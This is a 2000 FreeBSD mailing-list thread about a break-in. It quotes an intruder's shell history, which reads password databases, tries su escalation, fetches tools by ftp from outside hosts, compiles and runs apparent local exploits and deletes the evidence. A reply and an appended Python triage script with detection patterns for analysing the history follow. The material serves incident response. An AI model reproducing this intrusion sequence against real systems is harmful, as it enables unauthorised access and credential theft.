From owner-freebsd-questions Mon Dec 18 12:31:30 2000
From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 12:31:26 2000
Return-Path:
Delivered-To: freebsd-questions@freebsd.org
Received: from borg.starbase.net (unknown [208.233.101.2]) by hub.freebsd.org (Postfix) with ESMTP id 549CB37B400 for ; Mon, 18 Dec 2000 12:31:25 -0800 (PST)
Received: from localhost (alex@localhost) by borg.starbase.net (8.9.3/8.8.8) with ESMTP id PAA23648; Mon, 18 Dec 2000 15:31:02 -0500 (EST)
Date: Mon, 18 Dec 2000 15:31:02 -0500 (EST)
From: Alexander V P
X-Sender: alex@borg.starbase.net
To: "Gerald T. Freymann"
Cc: Questions
Subject: Re: Hacker history file - OUCH
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

hi,

do you keep/have logs about what ftp transfers he did? did you send mail to root@he.net, or the .mx domain? any idea how he broke in? what freebsd are you using?

if I were in your place, I'd unplug the box and try to find out more about this. don't do what most sysadmins do and just wipe the box.

alex

On Mon, 18 Dec 2000, Gerald T. Freymann wrote:

> Seems we have an intruder on one of our boxes... the .history file from the
> troubled account follows:
>
> cd bnc
> ls
> ./bash
> who
> cd /etc
> more passwd
> ps -l
> ls -l
> more pwd.db
> more hosts
> pico adduser.conf.bak
> pico group
> su user
> pico group.bak
> pico ftpuser
> O
> pico ftpusers
> su toor
> su operator
> id
> pico spwd.db
> su wheel
> pico passwd
> cd /var/tmp
> ls -a
> cd ...
> ls -a
> cd ..
> ls -l
> ls -al
> cd ...
> ftp copper.he.net
> chmod u+x xcon
> ./xcon
> id
> rm *
> ls
> who
> cd /var/tmp
> ls -a
> ls -al
> cd ...
> ls -a
> ftp cih.edu.mx
> ls
> cc bsd1 bsd-cron.c
> cc -o bsd1 bsd-cron.c
> ./bsd1
> id
> cc -o bsd2 bsd2.c
> ./bsd2
> id
> ls
> ftp cih.edu.mx
> ./bsd sh
> ./bsd.sh
> chmod u+x bsd.sh
> ./bsd.sh
> /tmp/sh
> id
> ls
> cc -o bsdsmail bsdsmail.c
> ./bsdsmail
> ls -a
> pico hack
> ls
> pico user.inf
> ls
> id
> rm *
> exit
>
> Anybody recognize what the intruder has set up?
>
> -Gerry

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
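Added example, not part of the thread above and not anything Gerry or Alex posted: a small triage script that turns a recovered .history dump like the one quoted into a tagged timeline, which is the kind of "find out more before wiping the box" step Alex recommends. The rule names and patterns are my own choices (credential files read, su attempts, uid checks, dot-named directories under /var/tmp, outbound ftp, compilation, execution of local binaries, cleanup with rm), and the embedded sample is a constructed excerpt of the quoted history so the script runs offline; point it at the real file with a path argument.

```python
import re
import sys
from collections import Counter

# Constructed sample: an excerpt of the .history quoted in the thread, embedded for an offline run.
SAMPLE_HISTORY = """\
cd /etc
more passwd
more pwd.db
pico ftpusers
su toor
su wheel
id
cd /var/tmp
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
cc -o bsd1 bsd-cron.c
./bsd1
/tmp/sh
exit
"""

# Each rule maps a tag to a regex applied to one history line (patterns are this example's own).
RULES = {
    "credential-file": re.compile(r"\b(master\.passwd|s?pwd\.db|passwd|group|ftpusers)\b"),
    "su-attempt":      re.compile(r"^su\b"),                     # su to another account
    "uid-check":       re.compile(r"^id\b"),                     # checking whether escalation worked
    "hidden-dir":      re.compile(r"^cd\s+(\.{3,}|\.[^./\s]\S*)"),  # "..." or ".name", but not "." / ".."
    "external-ftp":    re.compile(r"^ftp\s+(\S+)"),              # outbound transfer, host captured
    "compile":         re.compile(r"^(cc|gcc|make)\b"),          # building code on the victim
    "chmod-exec":      re.compile(r"^chmod\s+\S*[+=]\S*x"),      # making a dropped file executable
    "exec-local":      re.compile(r"^(\./\S+|/tmp/\S+|/var/tmp/\S+)"),  # running from cwd or tmp
    "cleanup":         re.compile(r"^rm\s+(\*|-rf?)"),           # bulk deletion of the working dir
}


def classify(line):
    """Return the set of tags whose rule matches this single history line."""
    return {tag for tag, rx in RULES.items() if rx.search(line)}


def triage_history(text):
    """Walk a .history dump and return (events, summary).

    events:  list of (line_no, command, sorted tags) for every line that hit a rule
    summary: per-tag counts, the ftp hosts contacted (abuse contacts to notify),
             and whether su attempts were paired with id checks (a privilege probe)
    """
    events, counts, ftp_hosts = [], Counter(), []
    for n, raw in enumerate(text.splitlines(), 1):
        cmd = raw.strip()
        if cmd.startswith(">"):            # tolerate a copy pasted from a mail quote
            cmd = cmd.lstrip("> ").strip()
        if not cmd:
            continue
        tags = classify(cmd)
        if not tags:
            continue
        events.append((n, cmd, sorted(tags)))
        counts.update(tags)
        m = RULES["external-ftp"].match(cmd)
        if m:
            ftp_hosts.append(m.group(1))
    summary = {
        "counts": dict(counts),
        "ftp_hosts": ftp_hosts,
        "privilege_probe": counts["su-attempt"] > 0 and counts["uid-check"] > 0,
    }
    return events, summary


if __name__ == "__main__":
    # Usage: python triage.py [/path/to/recovered/.history]; defaults to the embedded sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    events, summary = triage_history(text)
    for n, cmd, tags in events:
        print(f"{n:4d}  {cmd:<28} {', '.join(tags)}")
    print("\ncounts:", summary["counts"])
    print("ftp hosts contacted:", summary["ftp_hosts"])
    print("privilege probe (su + id):", summary["privilege_probe"])
```

The output is evidence to keep alongside the ftp transfer logs Alex asks about: the "ftp_hosts" list gives the upstream contacts to notify, and the pairing of su attempts with id checks shows which escalation paths the intruder tried, so the box can be investigated before it is rebuilt.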